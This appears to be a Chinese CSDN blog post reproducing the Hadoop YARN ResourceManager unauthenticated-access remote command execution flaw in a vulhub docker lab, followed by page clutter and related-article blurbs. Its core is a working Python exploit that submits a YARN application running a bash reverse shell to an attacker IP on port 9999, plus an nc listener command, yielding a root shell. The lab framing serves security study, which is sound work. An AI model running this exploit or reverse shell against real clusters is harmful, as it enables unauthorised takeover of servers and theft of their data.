hadoop yarn ResourceManager 页面未授权访问(含命令执行)

最新推荐文章于 2024-05-20 08:00:00 发布
最新推荐文章于 2024-05-20 08:00:00 发布
阅读量569 收藏
点赞数
分类专栏: 漏洞复现 docker 文章标签: hadoop 大数据 分布式
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/huayimy/article/details/130627216
版权

声明

严禁读者利用以上介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合 !

目录

环境搭建

 攻击复现

环境搭建

使用vulhub靶场,用docker启动环境

 

 访问hadoop页面

 攻击复现

1、先去攻击机监听端口

nc -lvvp 9999 #监听本地端口9999

2、再去靶机运行exp python exploit.py获取shell

Poc:

#!/usr/bin/env python

import requests

target = 'http://127.0.0.1:8088/'
lhost = 'x.x.x.x' # 修改lhost反弹shell的IP

url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {
    'application-id': app_id,
    'application-name': 'get-shell',
    'am-container-spec': {
        'commands': {
            'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
        },
    },
    'application-type': 'YARN',
}
requests.post(url, json=data)

将此poc更改IP后,放入靶机中,使用python3运行

python3 1.py

 此时攻击机中nc会显示获取到shell,权限为root

 

参考:

https://blog.csdn.net/weixin_44522540/article/details/122583636

huayimu
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
复现 Hadoop YARN ResourceManager 授权访问
weixin_52766206的博客
08-09 2190
复现 Hadoop YARN ResourceManager 授权访问,更多的是用来练习和熟悉漏洞的,就没安装到太复杂的环境,直接在kali里完成的。
hadoop漏洞_首发预警 | 黑客利用Hadoop Yarn资源管理系统授权访问漏洞进行攻击...
weixin_39731271的博客
12-20 315
4月30日,阿里云发现,俄罗斯黑客利用Hadoop Yarn资源管理系统REST API授权访问漏洞进行攻击。Hadoop是一款由Apache基金会推出的分布式系统框架,它通过著名的 MapReduce 算法进行分布式处理,YarnHadoop集群的资源管理系统。此次事件主要因Hadoop YARN 资源管理系统配置不当,导致可以授权进行访问,从而被攻击者恶意利用。攻击者无需认证即可通过R...
服务攻防-数据库安全-服务应用的安全问题以及测试流程-Mysql&Hadoop&授权访问&RCE-漏洞复现
ran的博客
05-05 3118
因为其服务是放在内网主机上面的,在内网内开了许多服务(端口 ),比如web和数据库,但是其只将web映射到外网,所以我们只能看到其服务在外网是开的,但是在进行扫描的时候我们扫描的仅仅是组网主机,而组网主机会将数据转发到内网再做处理,所以我们检测不到对应服务端口的开放。有些服务是通过口令验证来去判断服务的启动和禁用的,比如数据库里面有一些数据库里面就内置的数据库的用户,包括账号和密码,如果说设置的这个账号和密码过于简单的话,那么攻击者就可以通过弱口令的猜解得到账号以及密码之后进入,来进行一些安全的测试。
授权访问Hadoop 授权访问漏洞
最新发布
qq_68163788的博客
05-20 900
Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害。
Hadoop YARN ResourceManager 授权访问复现
carrot11223的博客
12-23 399
hadoop授权访问getshell
Hadoop YARN ResourceManager授权访问漏洞
Kevin's Blog
06-01 4969
文章目录一、介绍1.1 简介1.2 漏洞成因二、模拟环境三、信息收集四、攻击方法五、漏洞防御 一、介绍 1.1 简介   Hadoop作为一个分布式计算应用程序框架,种类功能繁多,各种组件安全问题会带来很大的攻击面。   Apache Hadoop YARNHadoop的核心组件之一,负责将资源分配在Hadoop集群中运行的各种应用程序,并调度要在不同集群节点上执行的任务。(独立出的资源管理框架,负责资源管理和调度) 1.2 漏洞成因   负责对资源进行同一管理调度的ReasourceManager组件的
Hadoop YARN ResourceManager 授权访问getshell
09-23
利用Hadoop YARN ResourceManager 授权访问getshell工具以及WORD说明
hadoop-yarn-server-resourcemanager-2.6.0-API文档-中文版.zip
04-23
赠送jar包:hadoop-yarn-server-resourcemanager-2.6.0.jar; 赠送原API文档:hadoop-yarn-server-resourcemanager-2.6.0-javadoc.jar; 赠送源代码:hadoop-yarn-server-resourcemanager-2.6.0-sources.jar; 赠送...
hadoop-yarn-server-resourcemanager-2.7.4.jar
08-06
hadoop2.7.4安装包补丁包,解决yarn定时调度启动问题!!
Hadoop Yarn 案例 2
07-16
在大数据处理领域,Hadoop YARN(Yet Another Resource Negotiator)是Apache Hadoop项目中的一个核心组件,负责管理和调度集群中的资源。YARN为大数据处理提供了高效、可扩展的资源管理框架,使得不同类型的计算...
Hadoop技术ResourceManager架构共8页
11-21
Hadoop生态系统中,ResourceManager(RM)扮演着至关重要的角色,它是YARN(Yet Another Resource Negotiator)架构的核心组成部分,负责集群资源的全局管理和调度。 1. YARN概述: YARNHadoop2.x引入的新一代...
Hadoop YARN ResourceManager 授权访问
aa1281047341的博客
10-19 134
Hadoop YARN ResourceManager 授权访问
Hadoop/Yarn REST API授权访问漏洞
weixin_44455388的博客
09-27 4251
一、基本情况 漏洞分布:所有版本 漏洞级别:高危 漏洞类别:授权漏洞 漏洞URL: http://25.215.209.1:19888/ http://25.215.209.1:50070/ http://25.215.209.1:50090/ http://25.215.209.1:50075/ http://25.215.209.1:8088/cluster 二、漏洞描述 Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了 Hadoop 机器 HDFS 的
Hadoop Yarn REST API授权漏洞利用
weixin_30564901的博客
08-21 1077
   Hadoop Yarn REST API授权漏洞利用 Hadoop是一个由Apache基金会所开发的分布式系统基础架构,YARNhadoop系统上的资源统一管理平台,其主要作用是实现集群资源的统一管理和调度,可以把MapReduce计算框架作为一个应用程序运行在YARN系统之上,通过YARN来管理资源。简单的说,用户可以向YARN提交特定应用程序进行执行,其中就允许执行相关...
Hadoop授权命令执行
jammny
11-15 1552
前言: Hadoop是一个由Apache基金会所开发的分布式系统基础架构,YARNhadoop系统上的资源统一管理平台,其主要作用是实现集群资源的统一管理和调度,可以把MapReduce计算框架作为一个应用程序运行在YARN系统之上,通过YARN来管理资源。简单的说,用户可以向YARN提交特定应用程序进行执行,其中就允许执行相关包系统命令yarn默认开发8088和8089端口。 漏洞利用: 利用exp反弹shell: 访问漏洞页面,这是Hadoop YARN ResourceManager.
中间件、服务器和Web服务器三者的区别
weixin_30644369的博客
03-06 485
一、服务器的定义: 服务器指的是一个管理资源并为用户提供服务的计算机软件,通常分为文件服务器、数据库服务器和应用程序服务器。运行以上软件的计算机或计算机系统也被称为服务器。 二、中间件 中间件是服务器上负责解析http请求的一组应用程序,负责接收并解析http请求数据包,在服务器上找到数据包所请求的文件后,将其返回给客户端,如果http数据包所请求的是一个动态脚本文件,如php等,中间...
hadoop漏洞_Hadoop 授权访问漏洞(exp核心代码实现)
weixin_35758982的博客
12-06 8393
一、环境搭建:进入镜像目录:cd vulhub/hadoop/unauthorized-yarn启动环境:docker-compose up -d访问8088端口二、漏洞描述:Hadoop作为一个分布式计算应用程序框架,种类功能繁多,各种组件安全问题会带来很大的攻击面。Apache Hadoop YARNHadoop的核心组件之一,负责将资源分配在Hadoop集群中运行的各种应用程序,...
获取resourcemanager页面(web页面url)脚本
qq_40844739的博客
09-09 824
获取resourcemanager页面url脚本
hadoop yarn 历史服务器 web无法访问
weixin_45675904的博客
08-12 1593
hadoop yarn 历史服务器 web无法访问
Hadoop 授权访问
07-14
hadoop yarn resourcemanager 授权访问是指用户没有足够的权限来访问hadoop yarn resourcemanager。这可能是由于用户没有正确配置或没有正确的身份验证凭据。要解决此问题,您可以检查hadoop yarn resourcemanager...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值